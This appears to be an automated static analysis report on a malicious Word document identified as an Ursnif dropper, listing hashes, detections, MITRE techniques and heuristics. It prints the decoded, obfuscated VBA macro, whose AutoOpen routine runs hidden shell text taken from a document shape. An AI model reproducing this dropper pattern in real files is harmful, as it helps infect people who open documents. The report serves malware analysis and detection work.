Ursnif — Office (OLE) malware analysis

Static analysis result for SHA-256 9c1cb1881729eeea…

MALICIOUS

Office (OLE)

68.0 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: fe23fdcf7d24fd5aa5e4b8771ea3636f SHA-1: 14f122917fbd1c36f20e0ceedc5bed246674168f SHA-256: 9c1cb1881729eeea65c0a51ec3e4c8e039e31fb188953907d7f15a614d2c03f4
142 Risk Score

Malware Insights

Ursnif · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Ursnif-6864686-0, indicating a likely Ursnif variant. The presence of an AutoOpen VBA macro, specifically the 'cdelovy' module and the 'AutoOpen' subroutine, strongly suggests an attempt to automatically execute malicious code upon opening the document. The script uses the Shell function to execute a payload, which is a common dropper behavior.

Heuristics 5

  • ClamAV: Doc.Dropper.Ursnif-6864686-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1421 bytes
SHA-256: 2551b4600e3fa78f519dcca96c48067c88f2f1db2dfc402ed7d549a86cff6d35
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "cdelovy"
Function AXHKQMW()

Dim ayhqbemo As Integer
Dim jrexocus As Long
ayhqbemo = 1968# - 3756#
Dim KJvVU As Variant
KJvVU = ayhqbemo - 7578#



Dim jwimi As Integer
Dim UOaysp As Long
jwimi = 1220# - 8750#
Dim moRafB As Variant
moRafB = jwimi - 5918#

Dim lzyn As Integer
Dim dLqSPjLh As Long
lzyn = 4084# - 5571#
Dim wqym As Variant
wqym = lzyn - 4760#



Set AXHKQMW = ActiveDocument.Shapes(2)



Dim UIjRGt As Integer
Dim SUVjIV As Long
UIjRGt = 8039# - 9059#
Dim zvabem As Variant
zvabem = UIjRGt - 2264#

End Function
Sub AutoOpen()

Dim eEQqfeCr As Integer
Dim pbcPwB As Long
eEQqfeCr = 3313# - 9824#
Dim bSrOkkgf As Variant
bSrOkkgf = eEQqfeCr - 1990#

Dim iWgMCwRD As Integer
Dim ldegelucana As Long
iWgMCwRD = 1424# - 6776#
Dim uPpqXW As Variant
uPpqXW = iWgMCwRD - 2136#



Set sxejelusuq = AXHKQMW

TNyzX = AXHKQMW.AlternativeText





Interaction.Shell@ _
TNyzX, vbHide





Dim bgeqitovox As Integer
Dim bfideviro As Long
bgeqitovox = 7227# - 5856#
Dim mgutubefar As Variant
mgutubefar = bgeqitovox - 1264#



End Sub